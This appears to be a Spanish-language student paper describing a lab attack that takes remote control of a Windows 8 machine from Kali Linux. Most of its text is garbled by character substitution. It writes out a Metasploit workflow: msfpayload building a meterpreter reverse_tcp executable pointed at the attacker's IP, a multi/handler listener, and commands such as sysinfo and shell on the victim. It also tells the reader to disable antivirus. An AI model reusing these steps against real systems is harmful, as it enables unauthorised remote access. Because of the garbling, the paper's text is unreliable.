KALI LINUX-WINDOWS 8Hack de windowsAndrade Bravo Andy Jos ico A!on"e #recia $a%a&yAndy'ose())*+,o"-ai&.co-/0rie&.-a%y+ya,oo.co- AbstractThis paper shows a process and the basic commandsto get into a window machine located in our own network, andthen to perform secretly and silently actions. In addition tambepossible security measures they are to prevent these computerattacks.Kali linux, puerto, windows, seguridad, exploit, shell,meterpreter.I.IN12ODU33IONKa&i Lin04 es 0n so5"ware de c6di%o a7ier"o8&in049:en5ocado a &a se%0ridad de &as redes in5or-;"icas: ka&i Lin04!osee 0n sinns"e sis"e-a !er-i"e rea&i/ar si%i&osa-en"e -edian"e 0nco-ando -e"er!re"er ?0e se e'ec0"a des!0s de &av0&neraci6n de 0n sis"e-a o!era"ivo y as= -edian"eco-ando de Windows ,acer o crear !roceso en e& sis"e-ao!era"ivo v0&nerado.II. KALILINUX Ka&i Lin04es 0na dis"ri70ci6nde Lin04avan/ada !ara!r0e7as de !ene"raci6n y a0di"or=as de se%0ridad.Ka&i es 0na co-!&e"a re-cons"r0cci6n de Back1rack Lin04desde &a 7ase ,acia arri7a: y se ad,iere co-!&e"a-en"e a &oses";ndares de desarro&&o de De7ian. 1oda &a n0evain5raes"r0c"0ra ,a sido !0es"a en e& &0%ar: "odas &as,erra-ien"as 50eron revisadas y 50eron e-7a&adas. @(AnmapKa&i Lin04 con"iene 0na serie de a!&icaciones o,erra-ien"as !ara 0so de escaneo: 0na de es"as es nmap e&c0a& es 0n !ro%ra-a de c6di%o a7ier"o ?0e sirve !araeva&0ar e& es"ado de &os !0er"os de 0na -a?0ina 8a7ier"os ocerrados9:desdee& "er-ina de ka&iLin04es"e"ienevarias5or-as !ara s0 0so e& c0a& a%i&i"a &a revisi6n de 0na red. @BALos 5or-a"os y s0s 0sos son &os si%0ien"esCara ver &as i!s en 0so de 0na red n-a! Ds i!EdeEinicioF-acaraEdeEred n-a!-s 444.444.444.444F-ascara de redara escanear 0n 1ODOLO#IA$edian"e e& si%0ien"e !roceso "endre-os acceso a 0na-a?0ina de windows 8.( -edian"e e& "erni-a& de Ka&iLin04. ri-era-en"e de7e-os "ener 0na -a?0ina con e&Sis"e-a O!era"ivo Ka&i Lin04: ?0ien sera e&a"acan"e en red con 0na -a?0ina de windows 8.(?0esera &a vic"i-a. In%resa-os a& "er-ina& den0es"ra -a?0ina vir"0a&ka&i Lin04y -edian"e e& codi%o ifconfig ve-os &adireccion i! de n0es"ra -a?0ina L0e%o de conocern0es"ra direccion i! -edian"e e&codi%o msfpayload windows /meterpreter/reverse_tcp !"ST#$%&.$'(.&&$.$&%)"*T#(+(+ , - /root/.esktop/e,plorer.e,ecrea-os e& arc,ivo e'ec0"a7&e ?0e nos !er-i"irae& accesoawindows: !arae&&oene& co-ando!"STI asi%na-os &a direccion i! de a"acan"e yen root asi%na-os &a direccion e& &a c0a& en secreara n0es"roarc,ivoe'ec0"a7&e: dic,oarc,ivode7e-os co!iar&o en &a -a?0ina vic"i-a. >L-ensa'e83rea"ed7y-s5!ay&oadJ.9?0ea!areceen&ai-a%ennos!er-i"irasa7er?0ee&ac,ivoe'ec0"a7&e se ,a creado correc"a-en"e. os"erior-en"e in%resa-os a msfconsole ?0ien es0n in"er!re"e de co-andos !ara con"in0ar cnn0es"ro o7'e"ivo. Ka den"ro demsfconsoledi%i"a-os e& codi%o usee,ploit/multi/handler!ara e&e%ir e& e4!&oi" enes"e caso handler?0e no es -as ?0e 0n co-ando!ara es"a7&ecer &a cone4i6n de!endiendo con"ra 0navic"i-a en0n!0er"ode"er-inado: -edian"eset)/0"/. windows /meterpreter/reverse_tcp A con"in0aci6n indica-os &a direcci6n i! a"acan"e ye& !0er"o -edian"ee& c0a& &o va ,acer !or -ediosde &os co-andos:set !"ST $%&.$'(.&&$.$&% yset )"*T (+(+corres!ondien"e-en"e. >& !0er"o8L8Les 13:0er"oa&"erna"ivo!arae& serviciowe7 A!ac,e. Hec,o es"o nos ?0eda e'ec0"ar e& co-ando e,ploit,-is-o ?0e ?0e e4!&o"a 0na o variasv0&nera7i&idades en 0n so5"ware de"er-inado:5rec0en"e-en"e es 0"i&i/ado !ara %anar acceso a 0nsis"e-a y "ener 0n nive& de con"ro& so7re &. @(A arain%resara&co-andometerpretere&arc,ivo.e4eco!iadoenWindows de7eser e'ec0"ado: a&,acer&o es"are-os den"ro de -e"er!re"er. A&in%resare& co-andosysinfo"ene-osaccesoa&ain5or-aci6nde&sis"e-a: de& ,os" v=c"i-a. ara!oder co!iar e& arc,ivo en Windows de7e-osdesac"ivar n0es"ro an"ivir0s. $edian"e e& co-andoShellaccede-os a &a07icaci6ndondees"aco!iadoe&arc,ivo.e4eenWindows y !or -edio de& co-ando dirse !0edenvi0a&i/ar &os arc,ivos ?0e esa 07icaci6n con"iene. >nes"e!0n"onoso"ros "ene-os "o"a& accesoa&,os" v=c"i-a y !ode-os crear arc,ivos en e&"er-ina& de ka&i y vis0a&i/ar&os en Windows. ara sa&ir so&o di%i"a-os e,itIM. 3ON3LUSION>S Nin%4!&oi". @Accessed LPBL(QA.@QAAdas"ra: N7&o%:N (( -ar/o BL((. @On&ineA. Avai&a7&eC,""!CFF",e,ackerway.co-FBL((FLGF((Fco-andos-y-conce!"os-7asicos--e"as!&oi"-5ra-eworkF. @AccessedGL '0nio BL(QA.